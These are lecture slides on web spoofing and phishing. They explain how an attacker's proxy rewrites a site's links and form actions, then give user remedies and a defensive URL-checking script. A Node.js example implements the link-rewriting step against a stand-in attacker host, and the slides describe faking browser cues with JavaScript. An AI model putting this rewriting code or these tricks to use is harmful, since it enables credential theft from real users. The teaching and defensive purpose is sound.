
Spoofing

Rafael Sabino 10/28/2004

Introduction
- What is spoofing?
- Context and security-relevant decisions
- Phishing
- Web spoofing
- Remedies

What is Spoofing?
Dictionary.com definitions:
- To deceive
- A hoax

Security Relevant Decisions
- Decisions that can lead to undesirable results
- Example: accepting data as being true and accurate

Context
The cues a user relies on when making a security-relevant decision:
- The browser, text, and pictures
- Names of objects
- Timing of events

Context Spoofing (Examples)

http://www.antiphishing.org/phishing_arc

Context Spoofing
- Spoofed emails have upwards of 20% success rates
- Costs billions of dollars to the industry
- Brand names attacked:
1. Citigroup
2. Wachovia
3. Bank of America
4. Yahoo!
5. eBay
6. PayPal
7. Best Buy
8. Microsoft MSN
9. FBI

Consequences
- Unauthorized surveillance
- Tampering
- Identity theft

What is Web Spoofing?
- Creating a shadow copy of the World Wide Web
- The shadow copy is funneled through the attacker's machine
- Data tampering, both on what the victim sends and on what the victim receives

Web Spoofing Attack
- The physical world can also be spoofed
- Security-relevant decisions and context

How does the Attack Work?
Step 1: Rewriting the URL. The real URL is appended to a URL on the attacker's server, so the request goes to the attacker. Example:
  home.netscape.com  becomes  www.attacker.com/http://home.netscape.com

How does the Attack Work?
Victim's browser <-> www.attacker.org <-> www.server.com
1. The browser requests the spoofed URL from www.attacker.org
2. www.attacker.org requests the real URL from www.server.com
3. www.server.com returns the real page contents to www.attacker.org
4. www.attacker.org changes the page (rewrites its links)
5. www.attacker.org returns the spoofed page to the browser

How does the Attack Work?
- Once the attacker's server has fetched the real page, it rewrites all the links in it
- The rewritten page is provided to the victim's browser
- Every subsequent click goes back through the attacker: this funnels all information through the attacker's machine
- Is it possible to spoof the whole web? Every page reached by following a rewritten link is fetched and rewritten the same way, so the shadow copy grows to cover whatever the victim visits

Forms
- Submitted form data goes to the attacker's server first, because the form's action URL is rewritten like every other link
- Allows for tampering with the submitted data before it is forwarded to the real server
- The attacker can also modify the data returned by the real server
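As an added example (not code from the slides, nor from the Princeton paper they draw on), here is the URL rewriting from steps 1, 2 and 4 above together with the form rewriting described on the Forms slide, in Node.js. The hostnames www.attacker.org and www.server.com are the slides' placeholders, home.netscape.com is the slides' example site, the sample page is constructed for the demonstration, and the function names are this example's own:

```javascript
// Added example, not code from the slides: the link-rewriting step of a
// web spoofing proxy as the slides describe it. Hostnames follow the slides
// (www.attacker.org for the attacker, www.server.com for the real site);
// the sample HTML below is constructed for the demonstration.
const ATTACKER = "https://www.attacker.org";

// Step 1 (and step 4, for every link): prefix the real absolute URL with the
// attacker's own URL, e.g. http://home.netscape.com/ becomes
// https://www.attacker.org/http://home.netscape.com/
function toSpoofUrl(realUrl) {
  return `${ATTACKER}/${new URL(realUrl).href}`;
}

// Step 2: the attacker's server recovers the real URL from the request it
// received so it can fetch the genuine page (step 3). Returns null when the
// request carries no embedded http(s) URL.
function fromSpoofUrl(spoofUrl) {
  const u = new URL(spoofUrl);
  const carried = u.pathname.slice(1) + u.search + u.hash;
  if (!/^https?:\/\//i.test(carried)) return null;
  return new URL(carried).href;
}

// Step 4: rewrite every href/src/action in the fetched page so the victim's
// next request (including a form submission) also goes to the attacker.
// Relative links are resolved against the real page's URL first; values with
// non-web schemes (mailto:, javascript:, data:) are left untouched.
function rewriteLinks(html, realPageUrl) {
  return html.replace(
    /\b(href|src|action)(\s*=\s*)(["'])(.*?)\3/gi,
    (match, attr, eq, quote, value) => {
      let target;
      try {
        target = new URL(value, realPageUrl);
      } catch (e) {
        return match; // unparsable attribute value: leave it as it was
      }
      if (target.protocol !== "http:" && target.protocol !== "https:") {
        return match;
      }
      return `${attr}${eq}${quote}${toSpoofUrl(target.href)}${quote}`;
    }
  );
}

// Constructed sample of a page on the real server (www.server.com).
const SAMPLE_PAGE = [
  '<a href="/docs/index.html">Docs</a>',
  '<a href="http://www.server.com/login">Log in</a>',
  '<img src="logo.gif">',
  '<form action="https://www.server.com/login" method="post">',
  '<a href="mailto:help@www.server.com">Contact</a>',
].join("\n");

// Runs the three steps on the sample and returns the results.
function demoRewrite() {
  const spoofed = toSpoofUrl("http://home.netscape.com/");
  const real = fromSpoofUrl(spoofed);
  const rewritten = rewriteLinks(SAMPLE_PAGE, "http://www.server.com/index.html");
  return { spoofed, real, rewritten };
}

if (typeof require !== "undefined" && require.main === module) {
  const r = demoRewrite();
  console.log(r.spoofed);
  console.log(r.real);
  console.log(r.rewritten);
}
```

The rewritten page still renders exactly like the original; the only difference is that every link, image and form action now begins with the attacker's host, which is why the victim stays inside the shadow copy after the first click.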

Secure Connections
- Everything will work the same
- The secure connection indicator will be turned on
- But the secure connection is with the attacker's server: the browser has a genuine encrypted session, and a padlock, for www.attacker.org, not for the site the victim believes they are on
- The secure connection indicator alone gives a false sense of security

Starting the Attack
- Put links to the spoofed pages in popular places
- Emails
- Search engines

Completing the Illusion
There are cues that can destroy the illusion:
- Status line
- Location line
- Viewing document source
In the browsers of the time these could be virtually eliminated with JavaScript. Current browsers ignore script writes to window.status and do not let a page hide or replace the location line, so the first two cues are more reliable today.

Status Line
- Displays the URL a link points to
- Displays the name of the server being contacted
- The attacker's answer is JavaScript: a script overwrites the status line text with the URL the victim expects to see

Location Line
- Displays the URL of the current page
- The user can type in any URL and so leave the shadow copy
- The attacker's answer is JavaScript: hide the real location line and draw a fake one that shows the expected URL and routes anything typed into it back through the attacker's server

Viewing Document Source
- The menu bar allows the user to see the page's source, which would reveal the rewritten links
- JavaScript can be used to create a fake menu bar that does not expose the rewritten page

Tracing the Attacker
- Possible if the attacker uses his or her own machine
- Stolen computers are used to launch attacks
- Hacked computers are used as well

What can we do?
Short-term solution:
- Disable JavaScript
- Make sure the location line is always visible
- Pay attention to the location line
Be selective with your features

What can we do?
- Do not reply to, or click on, a link in a message that leads you to a web page asking for personal information
- Look for the padlock and https://. Both must be present for the connection to be encrypted, but neither proves who you are connected to: the padlock vouches only for the host shown in the location line, and (as the Secure Connections slide showed) the attacker's server can show a valid padlock for its own name
- Keep up with software updates
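As an added example (not from the slides), a check on what the location line and padlock actually prove, covering the advice above and the Secure Connections slide: the padlock vouches only for the host in the authority part of the displayed URL, so a real site name buried later in the path, as in the slides' www.attacker.org/http://home.netscape.com, is just text. The hostnames are the slides' placeholders; inspectLocation and its expectedHost parameter (the site the user believes they are on) are this example's own, and the user@host case is a further input kind that the slides do not mention:

```javascript
// Added example, not code from the slides: what the location line tells you.
// expectedHost is a hypothetical parameter: the site the user believes they
// are visiting. Hostnames are the slides' placeholders.
function inspectLocation(displayedUrl, expectedHost) {
  const u = new URL(displayedUrl);
  const findings = [];

  // The browser connected to, and the padlock's certificate was issued for,
  // the host in the authority part of the URL. Nothing in the path counts.
  const authenticatedHost = u.hostname.toLowerCase();
  const encrypted = u.protocol === "https:";
  if (!encrypted) findings.push("no https: the padlock cannot be on");

  // An http:// or https:// inside the path, query or fragment is a URL being
  // carried to a proxy: the signature of the rewriting attack on the slides.
  const tail = u.pathname + u.search + u.hash;
  const embedded = [];
  for (const m of tail.matchAll(/https?:\/\/([^\/?#\s'"]+)/gi)) {
    embedded.push(m[1].toLowerCase());
  }
  if (embedded.length) findings.push(`URL embedded in path: ${embedded.join(", ")}`);

  // Input kind beyond the slides: user@host puts a trusted-looking name before
  // the "@"; the real host is whatever follows it.
  if (u.username) findings.push(`userinfo "${u.username}" precedes the real host`);

  // Is the host the padlock covers the one the user expects (or a subdomain)?
  const exp = expectedHost.toLowerCase();
  const sameSite = authenticatedHost === exp || authenticatedHost.endsWith("." + exp);
  if (!sameSite) findings.push(`connected to ${authenticatedHost}, not ${exp}`);

  return {
    authenticatedHost,
    encrypted,
    embedded,
    trustworthy: encrypted && sameSite && embedded.length === 0,
    findings,
  };
}

// Constructed location-line values for the demonstration.
function demoInspect() {
  return [
    "https://www.attacker.org/http://home.netscape.com/",
    "https://home.netscape.com/index.html",
    "http://home.netscape.com/",
    "https://home.netscape.com@www.attacker.org/",
  ].map((url) => ({ url, result: inspectLocation(url, "home.netscape.com") }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const { url, result } of demoInspect()) {
    console.log(url, "->", result.trustworthy ? "ok" : result.findings.join("; "));
  }
}
```

The first and last inputs both light the padlock, and both are connections to www.attacker.org; the check reports that because it reads only the host the browser authenticated, which is the habit the slides are asking the user to form.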

What can we do?
- Check your bank / credit card statements
- To report suspicious activity, send email to the Federal Trade Commission: uce@ftc.gov
- If you are a victim, file a complaint at www.ftc.gov

Resources
- www.antiphishing.com
- http://www.cs.princeton.edu/sip/pub/spoo
- Gary McGraw and Edward W. Felten. Java Security: Hostile Applets, Holes and Antidotes. John Wiley and Sons, New York, 1996.
